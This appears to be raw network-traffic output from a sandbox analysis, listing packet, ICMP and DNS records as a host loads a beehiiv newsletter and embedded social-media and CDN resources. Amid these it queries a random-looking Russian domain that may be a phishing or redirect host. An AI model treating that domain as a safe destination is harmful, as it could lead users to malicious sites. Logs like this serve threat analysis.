                                                                                                                                            Jan 15, 2025 19:16:23.867845058 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:23.867904902 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.868608952 CET50040443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:23.868637085 CET4435004035.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:26.560785055 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:26.560833931 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:26.560905933 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:26.561239958 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:26.561249971 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.050075054 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.050395966 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.050410032 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.050903082 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.051238060 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.051331997 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.051800966 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.052004099 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.052058935 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.229039907 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.229135990 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:27.229669094 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.229836941 CET50041443192.168.2.1635.190.10.96
                                                                                                                                            Jan 15, 2025 19:16:27.229856968 CET4435004135.190.10.96192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.229974031 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:16:34.230031013 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.230129957 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:16:34.230376005 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:16:34.230390072 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.868920088 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.869220972 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:16:34.869290113 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.869635105 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.869951963 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            Jan 15, 2025 19:16:34.870032072 CET44350042142.250.185.132192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:34.912813902 CET50042443192.168.2.16142.250.185.132
                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Jan 15, 2025 19:14:29.271056890 CET53547211.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:29.308280945 CET53636801.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.209024906 CET5087053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:30.210055113 CET6293453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:30.218681097 CET53508701.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.221328974 CET53629341.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:30.282537937 CET53523141.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.884803057 CET5032253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:31.885198116 CET5325653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:31.885765076 CET5352553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:31.886096001 CET5908153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:31.892085075 CET53503221.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.893335104 CET53532561.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.894908905 CET53653611.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.895277977 CET53535251.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:31.906615019 CET53590811.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.158031940 CET5580353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.158140898 CET5079553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.166883945 CET53558031.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.169874907 CET53507951.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.554584980 CET5120353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.554723978 CET6283353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.555001020 CET6381753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.555121899 CET5951453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.562091112 CET53595141.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.562263966 CET53638171.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.580617905 CET5839453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.580756903 CET5988453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.589000940 CET53583941.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.591223001 CET53598841.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.619810104 CET5357053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.619932890 CET5644153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:32.627443075 CET53564411.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.631127119 CET53535701.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:32.994096994 CET53608941.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.672760963 CET5998353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.672946930 CET5520053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.818263054 CET5332653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.818423033 CET5493353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.828530073 CET53533261.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.829041958 CET53549331.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.835710049 CET5072553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.835834980 CET5663253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:33.842940092 CET53507251.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:33.843389034 CET53566321.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.116122007 CET5587653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:34.116398096 CET5894653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:34.124018908 CET53558761.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.124371052 CET53589461.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:34.454505920 CET5556653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:34.454763889 CET5115153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:35.155297041 CET5798553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:35.155431986 CET6145853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:35.164803982 CET53579851.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.168529034 CET53614581.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.905080080 CET5860353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:35.905211926 CET6158153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:35.912162066 CET53586031.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:35.912630081 CET53615811.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.000799894 CET5934853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.000972986 CET5671653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.057981968 CET53593481.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.105674028 CET53567161.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.250977993 CET5338453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.251240969 CET6001453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.258388996 CET53600141.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.272445917 CET53533841.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.881895065 CET5055353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.883507013 CET6339153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.886953115 CET5348853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.887087107 CET5666253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.894433975 CET53534881.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.902993917 CET53566621.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.941014051 CET5331553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.941164017 CET6481053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:40.949763060 CET53533151.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:40.960242033 CET53648101.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.173300982 CET5303153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.173449993 CET4927953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.173774958 CET5797753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.173893929 CET4919753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.174453974 CET5411453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.174618006 CET5877853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.180649996 CET53530311.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.180866003 CET53579771.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.180943966 CET53491971.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181140900 CET53541141.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181265116 CET53587781.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.181509972 CET53492791.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.673974991 CET5431753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.674102068 CET5977953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.681740999 CET53597791.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.681814909 CET53543171.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.967783928 CET5393453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.967911959 CET5425653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.974576950 CET53542561.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.974920988 CET53539341.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.977210045 CET5106253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.977356911 CET5982453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:41.984299898 CET53510621.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.984323978 CET53598241.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.153629065 CET5136953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.153748989 CET6357453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.181143045 CET5604753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.181349993 CET5467353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.188466072 CET53560471.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.190850019 CET53546731.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.203336000 CET6259553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.203641891 CET5323353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.211690903 CET53625951.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.222954035 CET53532331.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.519192934 CET6407153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.519357920 CET5740053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.526168108 CET53574001.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.526339054 CET53640711.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.533051014 CET5398453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.533190966 CET5141753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:42.540183067 CET53539841.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:42.541023016 CET53514171.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.195636034 CET5347253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:44.195782900 CET5398853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:44.202433109 CET53534721.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:44.202557087 CET53539881.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:47.297094107 CET53600521.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.370878935 CET5237153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:51.371014118 CET6087053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:51.425441980 CET53608701.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:51.427370071 CET53523711.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.131685019 CET5505753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:53.133660078 CET5128353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:53.152149916 CET5389353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:53.152281046 CET6258553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:53.159888029 CET53625851.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:53.203562021 CET53538931.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:54.226062059 CET6077753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:54.226160049 CET5576653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:54.265108109 CET53557661.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:56.274306059 CET5794953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:56.274537086 CET5837953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:56.281577110 CET53583791.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:57.363181114 CET5582453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:14:57.363436937 CET5087053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:02.329907894 CET53630251.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:06.179615021 CET53619901.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:29.250202894 CET53501051.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:29.267334938 CET53633491.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:15:32.152168989 CET138138192.168.2.16192.168.2.255
                                                                                                                                            Jan 15, 2025 19:15:44.204672098 CET6537353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:44.204792023 CET5777353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:53.102567911 CET5817353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:53.102721930 CET5381553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:54.764988899 CET5821853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:54.765240908 CET6093353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:15:59.086087942 CET53516391.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:13.868845940 CET5097053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:13.869036913 CET5441953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:16.488296986 CET5896953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:16.488722086 CET5181353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:18.652383089 CET5723753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:18.652513981 CET6509353192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:18.653310061 CET6083553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:18.653476954 CET6252553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:19.038317919 CET5883553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:19.038559914 CET5771653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:19.656928062 CET6406053192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:19.657372952 CET6147853192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:20.979680061 CET6114553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:20.979749918 CET5902553192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.006768942 CET5740453192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.006952047 CET5460753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.014700890 CET53574041.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.015077114 CET53546071.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.026664019 CET5483153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.026899099 CET6402953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.034521103 CET53548311.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.034646034 CET53640291.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.242508888 CET4966253192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.242635012 CET6383653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.785567999 CET5418953192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.785726070 CET5590653192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.792831898 CET53541891.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.793050051 CET53559061.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.826041937 CET6369153192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.826179028 CET6498753192.168.2.161.1.1.1
                                                                                                                                            Jan 15, 2025 19:16:21.833646059 CET53636911.1.1.1192.168.2.16
                                                                                                                                            Jan 15, 2025 19:16:21.833941936 CET53649871.1.1.1192.168.2.16
                                                                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                                                                            Jan 15, 2025 19:14:40.105766058 CET192.168.2.161.1.1.1c286(Port unreachable)Destination Unreachable
                                                                                                                                            Jan 15, 2025 19:14:54.265336990 CET192.168.2.161.1.1.1c277(Port unreachable)Destination Unreachable
                                                                                                                                            Jan 15, 2025 19:16:13.911768913 CET192.168.2.161.1.1.1c299(Port unreachable)Destination Unreachable
                                                                                                                                            Jan 15, 2025 19:16:21.275445938 CET192.168.2.161.1.1.1c2ad(Port unreachable)Destination Unreachable
                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Jan 15, 2025 19:14:30.209024906 CET192.168.2.161.1.1.10xf05fStandard query (0)kanes-newsletter-871ead.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:30.210055113 CET192.168.2.161.1.1.10x5dd5Standard query (0)kanes-newsletter-871ead.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.884803057 CET192.168.2.161.1.1.10x82a1Standard query (0)media.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.885198116 CET192.168.2.161.1.1.10x48a2Standard query (0)media.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.885765076 CET192.168.2.161.1.1.10x5076Standard query (0)beehiiv-adnetwork-production.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:31.886096001 CET192.168.2.161.1.1.10x6547Standard query (0)beehiiv-adnetwork-production.s3.amazonaws.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.158031940 CET192.168.2.161.1.1.10xd859Standard query (0)kanes-newsletter-871ead.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.158140898 CET192.168.2.161.1.1.10xb538Standard query (0)kanes-newsletter-871ead.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.554584980 CET192.168.2.161.1.1.10xcd90Standard query (0)www.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.554723978 CET192.168.2.161.1.1.10x2bf5Standard query (0)www.tiktok.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.555001020 CET192.168.2.161.1.1.10x10e5Standard query (0)platform.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.555121899 CET192.168.2.161.1.1.10xc9c8Standard query (0)platform.twitter.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.580617905 CET192.168.2.161.1.1.10xbaf5Standard query (0)media.beehiiv.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.580756903 CET192.168.2.161.1.1.10x721Standard query (0)media.beehiiv.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.619810104 CET192.168.2.161.1.1.10x2989Standard query (0)beehiiv-adnetwork-production.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:32.619932890 CET192.168.2.161.1.1.10x5dcdStandard query (0)beehiiv-adnetwork-production.s3.amazonaws.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.672760963 CET192.168.2.161.1.1.10xad4aStandard query (0)lf16-tiktok-web.tiktokcdn-us.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.672946930 CET192.168.2.161.1.1.10xcc33Standard query (0)lf16-tiktok-web.tiktokcdn-us.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.818263054 CET192.168.2.161.1.1.10xdb52Standard query (0)platform.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.818423033 CET192.168.2.161.1.1.10x4f8eStandard query (0)platform.twitter.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.835710049 CET192.168.2.161.1.1.10x38c4Standard query (0)platform.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:33.835834980 CET192.168.2.161.1.1.10x4f90Standard query (0)platform.twitter.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.116122007 CET192.168.2.161.1.1.10xdd27Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.116398096 CET192.168.2.161.1.1.10x3499Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.454505920 CET192.168.2.161.1.1.10xe5d6Standard query (0)lf16-tiktok-web.tiktokcdn-us.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:34.454763889 CET192.168.2.161.1.1.10x55c8Standard query (0)lf16-tiktok-web.tiktokcdn-us.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.155297041 CET192.168.2.161.1.1.10x8b48Standard query (0)syndication.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.155431986 CET192.168.2.161.1.1.10x74a4Standard query (0)syndication.twitter.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.905080080 CET192.168.2.161.1.1.10xb01bStandard query (0)syndication.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:35.905211926 CET192.168.2.161.1.1.10x73eaStandard query (0)syndication.twitter.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.000799894 CET192.168.2.161.1.1.10x1ed2Standard query (0)2u9o.ptisepma.ruA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.000972986 CET192.168.2.161.1.1.10xd967Standard query (0)2u9o.ptisepma.ru65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.250977993 CET192.168.2.161.1.1.10x7cabStandard query (0)o922922.ingest.us.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.251240969 CET192.168.2.161.1.1.10x299eStandard query (0)o922922.ingest.us.sentry.io65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.881895065 CET192.168.2.161.1.1.10xf7beStandard query (0)client.px-cloud.netA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.883507013 CET192.168.2.161.1.1.10xb4b1Standard query (0)client.px-cloud.net65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.886953115 CET192.168.2.161.1.1.10xa018Standard query (0)embed.bsky.appA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.887087107 CET192.168.2.161.1.1.10xcf95Standard query (0)embed.bsky.app65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.941014051 CET192.168.2.161.1.1.10xf66eStandard query (0)o922922.ingest.us.sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:40.941164017 CET192.168.2.161.1.1.10xef00Standard query (0)o922922.ingest.us.sentry.io65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.173300982 CET192.168.2.161.1.1.10xd08Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.173449993 CET192.168.2.161.1.1.10x4f86Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.173774958 CET192.168.2.161.1.1.10xf98aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.173893929 CET192.168.2.161.1.1.10x7ac0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.174453974 CET192.168.2.161.1.1.10x57faStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.174618006 CET192.168.2.161.1.1.10x8e51Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.673974991 CET192.168.2.161.1.1.10x1edStandard query (0)embed.bsky.appA (IP address)IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.674102068 CET192.168.2.161.1.1.10x9441Standard query (0)embed.bsky.app65IN (0x0001)false
                                                                                                                                            Jan 15, 2025 19:14:41.967783928 CET192.168.2.161.1.1.10x32c0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
